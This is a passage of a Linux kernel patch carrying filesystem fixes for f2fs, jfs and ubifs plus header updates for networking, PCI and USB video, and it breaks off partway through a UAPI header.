+diff --git a/fs/f2fs/inode.c b/fs/f2fs/inode.c
+index 5d6fd824f74f2..229ddc2f7b079 100644
+--- a/fs/f2fs/inode.c
++++ b/fs/f2fs/inode.c
+@@ -621,9 +621,12 @@ void f2fs_update_inode(struct inode *inode, struct page *node_page)
+ 	ri->i_uid = cpu_to_le32(i_uid_read(inode));
+ 	ri->i_gid = cpu_to_le32(i_gid_read(inode));
+ 	ri->i_links = cpu_to_le32(inode->i_nlink);
+-	ri->i_size = cpu_to_le64(i_size_read(inode));
+ 	ri->i_blocks = cpu_to_le64(SECTOR_TO_BLOCK(inode->i_blocks) + 1);
+ 
++	if (!f2fs_is_atomic_file(inode) ||
++			is_inode_flag_set(inode, FI_ATOMIC_COMMITTED))
++		ri->i_size = cpu_to_le64(i_size_read(inode));
++
+ 	if (et) {
+ 		read_lock(&et->lock);
+ 		set_raw_extent(&et->largest, &ri->i_ext);
+@@ -761,11 +764,18 @@ int f2fs_write_inode(struct inode *inode, struct writeback_control *wbc)
+ void f2fs_evict_inode(struct inode *inode)
+ {
+ 	struct f2fs_sb_info *sbi = F2FS_I_SB(inode);
+-	nid_t xnid = F2FS_I(inode)->i_xattr_nid;
++	struct f2fs_inode_info *fi = F2FS_I(inode);
++	nid_t xnid = fi->i_xattr_nid;
+ 	int err = 0;
+ 
+ 	f2fs_abort_atomic_write(inode, true);
+ 
++	if (fi->cow_inode) {
++		clear_inode_flag(fi->cow_inode, FI_COW_FILE);
++		iput(fi->cow_inode);
++		fi->cow_inode = NULL;
++	}
++
+ 	trace_f2fs_evict_inode(inode);
+ 	truncate_inode_pages_final(&inode->i_data);
+ 
+@@ -852,7 +862,7 @@ no_delete:
+ 	stat_dec_inline_inode(inode);
+ 	stat_dec_compr_inode(inode);
+ 	stat_sub_compr_blocks(inode,
+-			atomic_read(&F2FS_I(inode)->i_compr_blocks));
++			atomic_read(&fi->i_compr_blocks));
+ 
+ 	if (likely(!f2fs_cp_error(sbi) &&
+ 				!is_sbi_flag_set(sbi, SBI_CP_DISABLED)))
+diff --git a/fs/f2fs/iostat.c b/fs/f2fs/iostat.c
+index 3166a8939ed4f..02393c95c9f86 100644
+--- a/fs/f2fs/iostat.c
++++ b/fs/f2fs/iostat.c
+@@ -227,8 +227,12 @@ static inline void __update_iostat_latency(struct bio_iostat_ctx *iostat_ctx,
+ 		return;
+ 
+ 	ts_diff = jiffies - iostat_ctx->submit_ts;
+-	if (iotype >= META_FLUSH)
++	if (iotype == META_FLUSH) {
+ 		iotype = META;
++	} else if (iotype >= NR_PAGE_TYPE) {
++		f2fs_warn(sbi, "%s: %d over NR_PAGE_TYPE", __func__, iotype);
++		return;
++	}
+ 
+ 	if (rw == 0) {
+ 		idx = READ_IO;
+diff --git a/fs/f2fs/segment.c b/fs/f2fs/segment.c
+index c1d0713666ee5..8d1e8c537daf0 100644
+--- a/fs/f2fs/segment.c
++++ b/fs/f2fs/segment.c
+@@ -192,14 +192,18 @@ void f2fs_abort_atomic_write(struct inode *inode, bool clean)
+ 	if (!f2fs_is_atomic_file(inode))
+ 		return;
+ 
+-	if (clean)
+-		truncate_inode_pages_final(inode->i_mapping);
+-	clear_inode_flag(fi->cow_inode, FI_COW_FILE);
+-	iput(fi->cow_inode);
+-	fi->cow_inode = NULL;
+ 	release_atomic_write_cnt(inode);
++	clear_inode_flag(inode, FI_ATOMIC_COMMITTED);
+ 	clear_inode_flag(inode, FI_ATOMIC_FILE);
+ 	stat_dec_atomic_inode(inode);
++
++	F2FS_I(inode)->atomic_write_task = NULL;
++
++	if (clean) {
++		truncate_inode_pages_final(inode->i_mapping);
++		f2fs_i_size_write(inode, fi->original_i_size);
++		fi->original_i_size = 0;
++	}
+ }
+ 
+ static int __replace_atomic_write_block(struct inode *inode, pgoff_t index,
+@@ -250,6 +254,9 @@ retry:
+ 	}
+ 
+ 	f2fs_put_dnode(&dn);
++
++	trace_f2fs_replace_atomic_write_block(inode, F2FS_I(inode)->cow_inode,
++					index, *old_addr, new_addr, recover);
+ 	return 0;
+ }
+ 
+@@ -335,10 +342,12 @@ next:
+ 	}
+ 
+ out:
+-	if (ret)
++	if (ret) {
+ 		sbi->revoked_atomic_block += fi->atomic_write_cnt;
+-	else
++	} else {
+ 		sbi->committed_atomic_block += fi->atomic_write_cnt;
++		set_inode_flag(inode, FI_ATOMIC_COMMITTED);
++	}
+ 
+ 	__complete_revoke_list(inode, &revoke_list, ret ? true : false);
+ 
+diff --git a/fs/f2fs/super.c b/fs/f2fs/super.c
+index eaabb85cb4ddb..14c87399efea2 100644
+--- a/fs/f2fs/super.c
++++ b/fs/f2fs/super.c
+@@ -1416,8 +1416,6 @@ static int f2fs_drop_inode(struct inode *inode)
+ 			atomic_inc(&inode->i_count);
+ 			spin_unlock(&inode->i_lock);
+ 
+-			f2fs_abort_atomic_write(inode, true);
+-
+ 			/* should remain fi->extent_tree for writepage */
+ 			f2fs_destroy_extent_node(inode);
+ 
+diff --git a/fs/f2fs/verity.c b/fs/f2fs/verity.c
+index c352fff88a5e6..3f4f3295f1c66 100644
+--- a/fs/f2fs/verity.c
++++ b/fs/f2fs/verity.c
+@@ -81,7 +81,7 @@ static int pagecache_write(struct inode *inode, const void *buf, size_t count,
+ 		size_t n = min_t(size_t, count,
+ 				 PAGE_SIZE - offset_in_page(pos));
+ 		struct page *page;
+-		void *fsdata;
++		void *fsdata = NULL;
+ 		int res;
+ 
+ 		res = aops->write_begin(NULL, mapping, pos, n, &page, &fsdata);
+diff --git a/fs/jfs/jfs_dmap.c b/fs/jfs/jfs_dmap.c
+index 765838578a722..a3eb1e8269477 100644
+--- a/fs/jfs/jfs_dmap.c
++++ b/fs/jfs/jfs_dmap.c
+@@ -193,7 +193,8 @@ int dbMount(struct inode *ipbmap)
+ 	bmp->db_agwidth = le32_to_cpu(dbmp_le->dn_agwidth);
+ 	bmp->db_agstart = le32_to_cpu(dbmp_le->dn_agstart);
+ 	bmp->db_agl2size = le32_to_cpu(dbmp_le->dn_agl2size);
+-	if (bmp->db_agl2size > L2MAXL2SIZE - L2MAXAG) {
++	if (bmp->db_agl2size > L2MAXL2SIZE - L2MAXAG ||
++	    bmp->db_agl2size < 0) {
+ 		err = -EINVAL;
+ 		goto err_release_metapage;
+ 	}
+diff --git a/fs/ubifs/budget.c b/fs/ubifs/budget.c
+index e8b9b756f0aca..d76eb7b39f564 100644
+--- a/fs/ubifs/budget.c
++++ b/fs/ubifs/budget.c
+@@ -209,11 +209,10 @@ long long ubifs_calc_available(const struct ubifs_info *c, int min_idx_lebs)
+ 	subtract_lebs += 1;
+ 
+ 	/*
+-	 * The GC journal head LEB is not really accessible. And since
+-	 * different write types go to different heads, we may count only on
+-	 * one head's space.
++	 * Since different write types go to different heads, we should
++	 * reserve one leb for each head.
+ 	 */
+-	subtract_lebs += c->jhead_cnt - 1;
++	subtract_lebs += c->jhead_cnt;
+ 
+ 	/* We also reserve one LEB for deletions, which bypass budgeting */
+ 	subtract_lebs += 1;
+@@ -400,7 +399,7 @@ static int calc_dd_growth(const struct ubifs_info *c,
+ 	dd_growth = req->dirtied_page ? c->bi.page_budget : 0;
+ 
+ 	if (req->dirtied_ino)
+-		dd_growth += c->bi.inode_budget << (req->dirtied_ino - 1);
++		dd_growth += c->bi.inode_budget * req->dirtied_ino;
+ 	if (req->mod_dent)
+ 		dd_growth += c->bi.dent_budget;
+ 	dd_growth += req->dirtied_ino_d;
+diff --git a/fs/ubifs/dir.c b/fs/ubifs/dir.c
+index 0f29cf2011361..5e6bcce94e641 100644
+--- a/fs/ubifs/dir.c
++++ b/fs/ubifs/dir.c
+@@ -1151,7 +1151,6 @@ static int ubifs_symlink(struct user_namespace *mnt_userns, struct inode *dir,
+ 	int err, sz_change, len = strlen(symname);
+ 	struct fscrypt_str disk_link;
+ 	struct ubifs_budget_req req = { .new_ino = 1, .new_dent = 1,
+-					.new_ino_d = ALIGN(len, 8),
+ 					.dirtied_ino = 1 };
+ 	struct fscrypt_name nm;
+ 
+@@ -1167,6 +1166,7 @@ static int ubifs_symlink(struct user_namespace *mnt_userns, struct inode *dir,
+ 	 * Budget request settings: new inode, new direntry and changing parent
+ 	 * directory inode.
+ 	 */
++	req.new_ino_d = ALIGN(disk_link.len - 1, 8);
+ 	err = ubifs_budget_space(c, &req);
+ 	if (err)
+ 		return err;
+@@ -1324,6 +1324,8 @@ static int do_rename(struct inode *old_dir, struct dentry *old_dentry,
+ 	if (unlink) {
+ 		ubifs_assert(c, inode_is_locked(new_inode));
+ 
++		/* Budget for old inode's data when its nlink > 1. */
++		req.dirtied_ino_d = ALIGN(ubifs_inode(new_inode)->data_len, 8);
+ 		err = ubifs_purge_xattrs(new_inode);
+ 		if (err)
+ 			return err;
+@@ -1576,6 +1578,10 @@ static int ubifs_xrename(struct inode *old_dir, struct dentry *old_dentry,
+ 		return err;
+ 	}
+ 
++	err = ubifs_budget_space(c, &req);
++	if (err)
++		goto out;
++
+ 	lock_4_inodes(old_dir, new_dir, NULL, NULL);
+ 
+ 	time = current_time(old_dir);
+@@ -1601,6 +1607,7 @@ static int ubifs_xrename(struct inode *old_dir, struct dentry *old_dentry,
+ 	unlock_4_inodes(old_dir, new_dir, NULL, NULL);
+ 	ubifs_release_budget(c, &req);
+ 
++out:
+ 	fscrypt_free_filename(&fst_nm);
+ 	fscrypt_free_filename(&snd_nm);
+ 	return err;
+diff --git a/fs/ubifs/file.c b/fs/ubifs/file.c
+index f2353dd676ef0..10c1779af9c51 100644
+--- a/fs/ubifs/file.c
++++ b/fs/ubifs/file.c
+@@ -1032,7 +1032,7 @@ static int ubifs_writepage(struct page *page, struct writeback_control *wbc)
+ 		if (page->index >= synced_i_size >> PAGE_SHIFT) {
+ 			err = inode->i_sb->s_op->write_inode(inode, NULL);
+ 			if (err)
+-				goto out_unlock;
++				goto out_redirty;
+ 			/*
+ 			 * The inode has been written, but the write-buffer has
+ 			 * not been synchronized, so in case of an unclean
+@@ -1060,11 +1060,17 @@ static int ubifs_writepage(struct page *page, struct writeback_control *wbc)
+ 	if (i_size > synced_i_size) {
+ 		err = inode->i_sb->s_op->write_inode(inode, NULL);
+ 		if (err)
+-			goto out_unlock;
++			goto out_redirty;
+ 	}
+ 
+ 	return do_writepage(page, len);
+-
++out_redirty:
++	/*
++	 * redirty_page_for_writepage() won't call ubifs_dirty_inode() because
++	 * it passes I_DIRTY_PAGES flag while calling __mark_inode_dirty(), so
++	 * there is no need to do space budget for dirty inode.
++	 */
++	redirty_page_for_writepage(wbc, page);
+ out_unlock:
+ 	unlock_page(page);
+ 	return err;
+@@ -1466,14 +1472,23 @@ static bool ubifs_release_folio(struct folio *folio, gfp_t unused_gfp_flags)
+ 	struct inode *inode = folio->mapping->host;
+ 	struct ubifs_info *c = inode->i_sb->s_fs_info;
+ 
+-	/*
+-	 * An attempt to release a dirty page without budgeting for it - should
+-	 * not happen.
+-	 */
+ 	if (folio_test_writeback(folio))
+ 		return false;
++
++	/*
++	 * Page is private but not dirty, weird? There is one condition
++	 * making it happened. ubifs_writepage skipped the page because
++	 * page index beyonds isize (for example. truncated by other
++	 * process named A), then the page is invalidated by fadvise64
++	 * syscall before being truncated by process A.
++	 */
+ 	ubifs_assert(c, folio_test_private(folio));
+-	ubifs_assert(c, 0);
++	if (folio_test_checked(folio))
++		release_new_page_budget(c);
++	else
++		release_existing_page_budget(c);
++
++	atomic_long_dec(&c->dirty_pg_cnt);
+ 	folio_detach_private(folio);
+ 	folio_clear_checked(folio);
+ 	return true;
+diff --git a/fs/ubifs/super.c b/fs/ubifs/super.c
+index d0c9a09988bc7..32cb147597960 100644
+--- a/fs/ubifs/super.c
++++ b/fs/ubifs/super.c
+@@ -833,7 +833,7 @@ static int alloc_wbufs(struct ubifs_info *c)
+ 		INIT_LIST_HEAD(&c->jheads[i].buds_list);
+ 		err = ubifs_wbuf_init(c, &c->jheads[i].wbuf);
+ 		if (err)
+-			return err;
++			goto out_wbuf;
+ 
+ 		c->jheads[i].wbuf.sync_callback = &bud_wbuf_callback;
+ 		c->jheads[i].wbuf.jhead = i;
+@@ -841,7 +841,7 @@ static int alloc_wbufs(struct ubifs_info *c)
+ 		c->jheads[i].log_hash = ubifs_hash_get_desc(c);
+ 		if (IS_ERR(c->jheads[i].log_hash)) {
+ 			err = PTR_ERR(c->jheads[i].log_hash);
+-			goto out;
++			goto out_log_hash;
+ 		}
+ 	}
+ 
+@@ -854,9 +854,18 @@ static int alloc_wbufs(struct ubifs_info *c)
+ 
+ 	return 0;
+ 
+-out:
+-	while (i--)
++out_log_hash:
++	kfree(c->jheads[i].wbuf.buf);
++	kfree(c->jheads[i].wbuf.inodes);
++
++out_wbuf:
++	while (i--) {
++		kfree(c->jheads[i].wbuf.buf);
++		kfree(c->jheads[i].wbuf.inodes);
+ 		kfree(c->jheads[i].log_hash);
++	}
++	kfree(c->jheads);
++	c->jheads = NULL;
+ 
+ 	return err;
+ }
+diff --git a/fs/ubifs/sysfs.c b/fs/ubifs/sysfs.c
+index 06ad8fa1fcfb0..54270ad36321e 100644
+--- a/fs/ubifs/sysfs.c
++++ b/fs/ubifs/sysfs.c
+@@ -144,6 +144,8 @@ int __init ubifs_sysfs_init(void)
+ 	kobject_set_name(&ubifs_kset.kobj, "ubifs");
+ 	ubifs_kset.kobj.parent = fs_kobj;
+ 	ret = kset_register(&ubifs_kset);
++	if (ret)
++		kset_put(&ubifs_kset);
+ 
+ 	return ret;
+ }
+diff --git a/fs/ubifs/tnc.c b/fs/ubifs/tnc.c
+index 488f3da7a6c6c..2469f72eeaabb 100644
+--- a/fs/ubifs/tnc.c
++++ b/fs/ubifs/tnc.c
+@@ -267,11 +267,18 @@ static struct ubifs_znode *dirty_cow_znode(struct ubifs_info *c,
+ 	if (zbr->len) {
+ 		err = insert_old_idx(c, zbr->lnum, zbr->offs);
+ 		if (unlikely(err))
+-			return ERR_PTR(err);
++			/*
++			 * Obsolete znodes will be freed by tnc_destroy_cnext()
++			 * or free_obsolete_znodes(), copied up znodes should
++			 * be added back to tnc and freed by
++			 * ubifs_destroy_tnc_subtree().
++			 */
++			goto out;
+ 		err = add_idx_dirt(c, zbr->lnum, zbr->len);
+ 	} else
+ 		err = 0;
+ 
++out:
+ 	zbr->znode = zn;
+ 	zbr->lnum = 0;
+ 	zbr->offs = 0;
+@@ -3053,6 +3060,21 @@ static void tnc_destroy_cnext(struct ubifs_info *c)
+ 		cnext = cnext->cnext;
+ 		if (ubifs_zn_obsolete(znode))
+ 			kfree(znode);
++		else if (!ubifs_zn_cow(znode)) {
++			/*
++			 * Don't forget to update clean znode count after
++			 * committing failed, because ubifs will check this
++			 * count while closing tnc. Non-obsolete znode could
++			 * be re-dirtied during committing process, so dirty
++			 * flag is untrustable. The flag 'COW_ZNODE' is set
++			 * for each dirty znode before committing, and it is
++			 * cleared as long as the znode become clean, so we
++			 * can statistic clean znode count according to this
++			 * flag.
++			 */
++			atomic_long_inc(&c->clean_zn_cnt);
++			atomic_long_inc(&ubifs_clean_zn_cnt);
++		}
+ 	} while (cnext && cnext != c->cnext);
+ }
+ 
+diff --git a/fs/ubifs/ubifs.h b/fs/ubifs/ubifs.h
+index 478bbbb5382f8..2f1f315810949 100644
+--- a/fs/ubifs/ubifs.h
++++ b/fs/ubifs/ubifs.h
+@@ -1623,8 +1623,13 @@ static inline int ubifs_check_hmac(const struct ubifs_info *c,
+ 	return crypto_memneq(expected, got, c->hmac_desc_len);
+ }
+ 
++#ifdef CONFIG_UBIFS_FS_AUTHENTICATION
+ void ubifs_bad_hash(const struct ubifs_info *c, const void *node,
+ 		    const u8 *hash, int lnum, int offs);
++#else
++static inline void ubifs_bad_hash(const struct ubifs_info *c, const void *node,
++				  const u8 *hash, int lnum, int offs) {};
++#endif
+ 
+ int __ubifs_node_check_hash(const struct ubifs_info *c, const void *buf,
+ 			  const u8 *expected);
+diff --git a/include/acpi/acpi_bus.h b/include/acpi/acpi_bus.h
+index ab2d6266038a0..6badc50ec4e66 100644
+--- a/include/acpi/acpi_bus.h
++++ b/include/acpi/acpi_bus.h
+@@ -534,6 +534,7 @@ int acpi_bus_update_power(acpi_handle handle, int *state_p);
+ int acpi_device_update_power(struct acpi_device *device, int *state_p);
+ bool acpi_bus_power_manageable(acpi_handle handle);
+ void acpi_dev_power_up_children_with_adr(struct acpi_device *adev);
++u8 acpi_dev_power_state_for_wake(struct acpi_device *adev);
+ int acpi_device_power_add_dependent(struct acpi_device *adev,
+ 				    struct device *dev);
+ void acpi_device_power_remove_dependent(struct acpi_device *adev,
+diff --git a/include/drm/display/drm_dp_mst_helper.h b/include/drm/display/drm_dp_mst_helper.h
+index 41fd8352ab656..6c0c3dc3d3aca 100644
+--- a/include/drm/display/drm_dp_mst_helper.h
++++ b/include/drm/display/drm_dp_mst_helper.h
+@@ -867,6 +867,9 @@ struct drm_dp_mst_topology_state *
+ drm_atomic_get_mst_topology_state(struct drm_atomic_state *state,
+ 				  struct drm_dp_mst_topology_mgr *mgr);
+ struct drm_dp_mst_topology_state *
++drm_atomic_get_old_mst_topology_state(struct drm_atomic_state *state,
++				      struct drm_dp_mst_topology_mgr *mgr);
++struct drm_dp_mst_topology_state *
+ drm_atomic_get_new_mst_topology_state(struct drm_atomic_state *state,
+ 				      struct drm_dp_mst_topology_mgr *mgr);
+ struct drm_dp_mst_atomic_payload *
+diff --git a/include/linux/bootconfig.h b/include/linux/bootconfig.h
+index 1611f9db878e7..ca73940e26df8 100644
+--- a/include/linux/bootconfig.h
++++ b/include/linux/bootconfig.h
+@@ -59,7 +59,7 @@ struct xbc_node {
+ /* Maximum size of boot config is 32KB - 1 */
+ #define XBC_DATA_MAX	(XBC_VALUE - 1)
+ 
+-#define XBC_NODE_MAX	1024
++#define XBC_NODE_MAX	8192
+ #define XBC_KEYLEN_MAX	256
+ #define XBC_DEPTH_MAX	16
+ 
+diff --git a/include/linux/mdio/mdio-mscc-miim.h b/include/linux/mdio/mdio-mscc-miim.h
+index 5b4ed2c3cbb9a..1ce699740af63 100644
+--- a/include/linux/mdio/mdio-mscc-miim.h
++++ b/include/linux/mdio/mdio-mscc-miim.h
+@@ -14,6 +14,6 @@
+ 
+ int mscc_miim_setup(struct device *device, struct mii_bus **bus,
+ 		    const char *name, struct regmap *mii_regmap,
+-		    int status_offset);
++		    int status_offset, bool ignore_read_errors);
+ 
+ #endif
+diff --git a/include/linux/netfilter.h b/include/linux/netfilter.h
+index d8817d381c14b..bef8db9d6c085 100644
+--- a/include/linux/netfilter.h
++++ b/include/linux/netfilter.h
+@@ -488,4 +488,9 @@ extern const struct nfnl_ct_hook __rcu *nfnl_ct_hook;
+  */
+ DECLARE_PER_CPU(bool, nf_skb_duplicated);
+ 
++/**
++ * Contains bitmask of ctnetlink event subscribers, if any.
++ * Can't be pernet due to NETLINK_LISTEN_ALL_NSID setsockopt flag.
++ */
++extern u8 nf_ctnetlink_has_listener;
+ #endif /*__LINUX_NETFILTER_H*/
+diff --git a/include/linux/pci.h b/include/linux/pci.h
+index 2bda4a4e47e81..cb538bc579710 100644
+--- a/include/linux/pci.h
++++ b/include/linux/pci.h
+@@ -570,6 +570,7 @@ struct pci_host_bridge {
+ 	void		*release_data;
+ 	unsigned int	ignore_reset_delay:1;	/* For entire hierarchy */
+ 	unsigned int	no_ext_tags:1;		/* No Extended Tags */
++	unsigned int	no_inc_mrrs:1;		/* No Increase MRRS */
+ 	unsigned int	native_aer:1;		/* OS may use PCIe AER */
+ 	unsigned int	native_pcie_hotplug:1;	/* OS may use PCIe hotplug */
+ 	unsigned int	native_shpc_hotplug:1;	/* OS may use SHPC hotplug */
+diff --git a/include/linux/pci_ids.h b/include/linux/pci_ids.h
+index b362d90eb9b0b..bc8f484cdcf3b 100644
+--- a/include/linux/pci_ids.h
++++ b/include/linux/pci_ids.h
+@@ -3012,6 +3012,8 @@
+ #define PCI_DEVICE_ID_INTEL_VMD_9A0B	0x9a0b
+ #define PCI_DEVICE_ID_INTEL_S21152BB	0xb152
+ 
++#define PCI_VENDOR_ID_WANGXUN		0x8088
++
+ #define PCI_VENDOR_ID_SCALEMP		0x8686
+ #define PCI_DEVICE_ID_SCALEMP_VSMP_CTL	0x1010
+ 
+diff --git a/include/media/v4l2-uvc.h b/include/media/v4l2-uvc.h
+index f83e31661333b..b010a36fc1d95 100644
+--- a/include/media/v4l2-uvc.h
++++ b/include/media/v4l2-uvc.h
+@@ -99,6 +99,9 @@
+ #define UVC_GUID_FORMAT_BGR3 \
+ 	{ 0x7d, 0xeb, 0x36, 0xe4, 0x4f, 0x52, 0xce, 0x11, \
+ 	 0x9f, 0x53, 0x00, 0x20, 0xaf, 0x0b, 0xa7, 0x70}
++#define UVC_GUID_FORMAT_BGR4 \
++	{ 0x7e, 0xeb, 0x36, 0xe4, 0x4f, 0x52, 0xce, 0x11, \
++	 0x9f, 0x53, 0x00, 0x20, 0xaf, 0x0b, 0xa7, 0x70}
+ #define UVC_GUID_FORMAT_M420 \
+ 	{ 'M',  '4',  '2',  '0', 0x00, 0x00, 0x10, 0x00, \
+ 	 0x80, 0x00, 0x00, 0xaa, 0x00, 0x38, 0x9b, 0x71}
+@@ -266,6 +269,11 @@ static struct uvc_format_desc uvc_fmts[] = {
+ 		.guid		= UVC_GUID_FORMAT_BGR3,
+ 		.fcc		= V4L2_PIX_FMT_BGR24,
+ 	},
++	{
++		.name		= "BGRA/X 8:8:8:8 (BGR4)",
++		.guid		= UVC_GUID_FORMAT_BGR4,
++		.fcc		= V4L2_PIX_FMT_XBGR32,
++	},
+ 	{
+ 		.name		= "H.264",
+ 		.guid		= UVC_GUID_FORMAT_H264,
+diff --git a/include/memory/renesas-rpc-if.h b/include/memory/renesas-rpc-if.h
+index 9c0ad64b8d292..ddf94356752d3 100644
+--- a/include/memory/renesas-rpc-if.h
++++ b/include/memory/renesas-rpc-if.h
+@@ -64,24 +64,8 @@ enum rpcif_type {
+ 
+ struct rpcif {
+ 	struct device *dev;
+-	void __iomem *base;
+ 	void __iomem *dirmap;
+-	struct regmap *regmap;
+-	struct reset_control *rstc;
+ 	size_t size;
+-	enum rpcif_type type;
+-	enum rpcif_data_dir dir;
+-	u8 bus_size;
+-	u8 xfer_size;
+-	void *buffer;
+-	u32 xferlen;
+-	u32 smcr;
+-	u32 smadr;
+-	u32 command;		/* DRCMR or SMCMR */
+-	u32 option;		/* DROPR or SMOPR */
+-	u32 enable;		/* DRENR or SMENR */
+-	u32 dummy;		/* DRDMCR or SMDMCR */
+-	u32 ddr;		/* DRDRENR or SMDRENR */
+ };
+ 
+ int rpcif_sw_init(struct rpcif *rpc, struct device *dev);
+diff --git a/include/net/netns/conntrack.h b/include/net/netns/conntrack.h
+index e1290c159184a..1f463b3957c78 100644
+--- a/include/net/netns/conntrack.h
++++ b/include/net/netns/conntrack.h
+@@ -95,7 +95,6 @@ struct nf_ip_net {
+ 
+ struct netns_ct {
+ #ifdef CONFIG_NF_CONNTRACK_EVENTS
+-	u8 ctnetlink_has_listener;
+ 	bool ecache_dwork_pending;
+ #endif
+ 	u8			sysctl_log_invalid; /* Log invalid packets */
+diff --git a/include/net/sctp/structs.h b/include/net/sctp/structs.h
+index 350f250b0dc75..00ee9eb601a6f 100644
+--- a/include/net/sctp/structs.h
++++ b/include/net/sctp/structs.h
+@@ -1409,6 +1409,7 @@ struct sctp_stream_priorities {
+ 	/* The next stream in line */
+ 	struct sctp_stream_out_ext *next;
+ 	__u16 prio;
++	__u16 users;
+ };
+ 
+ struct sctp_stream_out_ext {
+diff --git a/include/net/tc_act/tc_pedit.h b/include/net/tc_act/tc_pedit.h
+index 3e02709a1df65..83fe399317818 100644
+--- a/include/net/tc_act/tc_pedit.h
++++ b/include/net/tc_act/tc_pedit.h
+@@ -4,22 +4,29 @@
+ 
+ #include <net/act_api.h>
+ #include <linux/tc_act/tc_pedit.h>
++#include <linux/types.h>
+ 
+ struct tcf_pedit_key_ex {
+ 	enum pedit_header_type htype;
+ 	enum pedit_cmd cmd;
+ };
+ 
+-struct tcf_pedit {
+-	struct tc_action	common;
+-	unsigned char		tcfp_nkeys;
+-	unsigned char		tcfp_flags;
+-	u32			tcfp_off_max_hint;
++struct tcf_pedit_parms {
+ 	struct tc_pedit_key	*tcfp_keys;
+ 	struct tcf_pedit_key_ex	*tcfp_keys_ex;
++	u32 tcfp_off_max_hint;
++	unsigned char tcfp_nkeys;
++	unsigned char tcfp_flags;
++	struct rcu_head rcu;
++};
++
++struct tcf_pedit {
++	struct tc_action common;
++	struct tcf_pedit_parms __rcu *parms;
+ };
+ 
+ #define to_pedit(a) ((struct tcf_pedit *)a)
++#define to_pedit_parms(a) (rcu_dereference(to_pedit(a)->parms))
+ 
+ static inline bool is_tcf_pedit(const struct tc_action *a)
+ {
+@@ -32,37 +39,81 @@ static inline bool is_tcf_pedit(const struct tc_action *a)
+ 
+ static inline int tcf_pedit_nkeys(const struct tc_action *a)
+ {
+-	return to_pedit(a)->tcfp_nkeys;
++	struct tcf_pedit_parms *parms;
++	int nkeys;
++
++	rcu_read_lock();
++	parms = to_pedit_parms(a);
++	nkeys = parms->tcfp_nkeys;
++	rcu_read_unlock();
++
++	return nkeys;
+ }
+ 
+ static inline u32 tcf_pedit_htype(const struct tc_action *a, int index)
+ {
+-	if (to_pedit(a)->tcfp_keys_ex)
+-		return to_pedit(a)->tcfp_keys_ex[index].htype;
++	u32 htype = TCA_PEDIT_KEY_EX_HDR_TYPE_NETWORK;
++	struct tcf_pedit_parms *parms;
++
++	rcu_read_lock();
++	parms = to_pedit_parms(a);
++	if (parms->tcfp_keys_ex)
++		htype = parms->tcfp_keys_ex[index].htype;
++	rcu_read_unlock();
+ 
+-	return TCA_PEDIT_KEY_EX_HDR_TYPE_NETWORK;
++	return htype;
+ }
+ 
+ static inline u32 tcf_pedit_cmd(const struct tc_action *a, int index)
+ {
+-	if (to_pedit(a)->tcfp_keys_ex)
+-		return to_pedit(a)->tcfp_keys_ex[index].cmd;
++	struct tcf_pedit_parms *parms;
++	u32 cmd = __PEDIT_CMD_MAX;
+ 
+-	return __PEDIT_CMD_MAX;
++	rcu_read_lock();
++	parms = to_pedit_parms(a);
++	if (parms->tcfp_keys_ex)
++		cmd = parms->tcfp_keys_ex[index].cmd;
++	rcu_read_unlock();
++
++	return cmd;
+ }
+ 
+ static inline u32 tcf_pedit_mask(const struct tc_action *a, int index)
+ {
+-	return to_pedit(a)->tcfp_keys[index].mask;
++	struct tcf_pedit_parms *parms;
++	u32 mask;
++
++	rcu_read_lock();
++	parms = to_pedit_parms(a);
++	mask = parms->tcfp_keys[index].mask;
++	rcu_read_unlock();
++
++	return mask;
+ }
+ 
+ static inline u32 tcf_pedit_val(const struct tc_action *a, int index)
+ {
+-	return to_pedit(a)->tcfp_keys[index].val;
++	struct tcf_pedit_parms *parms;
++	u32 val;
++
++	rcu_read_lock();
++	parms = to_pedit_parms(a);
++	val = parms->tcfp_keys[index].val;
++	rcu_read_unlock();
++
++	return val;
+ }
+ 
+ static inline u32 tcf_pedit_offset(const struct tc_action *a, int index)
+ {
+-	return to_pedit(a)->tcfp_keys[index].off;
++	struct tcf_pedit_parms *parms;
++	u32 off;
++
++	rcu_read_lock();
++	parms = to_pedit_parms(a);
++	off = parms->tcfp_keys[index].off;
++	rcu_read_unlock();
++
++	return off;
+ }
+ #endif /* __NET_TC_PED_H */
+diff --git a/include/trace/events/f2fs.h b/include/trace/events/f2fs.h
+index ff57e7f9914cc..e57f867191ef1 100644
+--- a/include/trace/events/f2fs.h
++++ b/include/trace/events/f2fs.h
+@@ -1286,6 +1286,43 @@ DEFINE_EVENT(f2fs__page, f2fs_vm_page_mkwrite,
+ 	TP_ARGS(page, type)
+ );
+ 
++TRACE_EVENT(f2fs_replace_atomic_write_block,
++
++	TP_PROTO(struct inode *inode, struct inode *cow_inode, pgoff_t index,
++			block_t old_addr, block_t new_addr, bool recovery),
++
++	TP_ARGS(inode, cow_inode, index, old_addr, new_addr, recovery),
++
++	TP_STRUCT__entry(
++		__field(dev_t,	dev)
++		__field(ino_t,	ino)
++		__field(ino_t,	cow_ino)
++		__field(pgoff_t, index)
++		__field(block_t, old_addr)
++		__field(block_t, new_addr)
++		__field(bool, recovery)
++	),
++
++	TP_fast_assign(
++		__entry->dev		= inode->i_sb->s_dev;
++		__entry->ino		= inode->i_ino;
++		__entry->cow_ino	= cow_inode->i_ino;
++		__entry->index		= index;
++		__entry->old_addr	= old_addr;
++		__entry->new_addr	= new_addr;
++		__entry->recovery	= recovery;
++	),
++
++	TP_printk("dev = (%d,%d), ino = %lu, cow_ino = %lu, index = %lu, "
++			"old_addr = 0x%llx, new_addr = 0x%llx, recovery = %d",
++		show_dev_ino(__entry),
++		__entry->cow_ino,
++		(unsigned long)__entry->index,
++		(unsigned long long)__entry->old_addr,
++		(unsigned long long)__entry->new_addr,
++		__entry->recovery)
++);
++
+ TRACE_EVENT(f2fs_filemap_fault,
+ 
+ 	TP_PROTO(struct inode *inode, pgoff_t index, unsigned long ret),
+diff --git a/include/uapi/linux/usb/video.h b/include/uapi/linux/usb/video.h
+index bfdae12cdacf8..c58854fb7d94a 100644
+--- a/include/uapi/linux/usb/video.h
++++ b/include/uapi/linux/usb/video.h
+@@ -179,6 +179,36 @@
+ #define UVC_CONTROL_CAP_AUTOUPDATE			(1 << 3)
+ #define UVC_CONTROL_CAP_ASYNCHRONOUS			(1 << 4)
+ 
++/* 3.9.2.6 Color Matching Descriptor Values */
++enum uvc_color_primaries_values {
++	UVC_COLOR_PRIMARIES_UNSPECIFIED,
++	UVC_COLOR_PRIMARIES_BT_709_SRGB,
++	UVC_COLOR_PRIMARIES_BT_470_2_M,
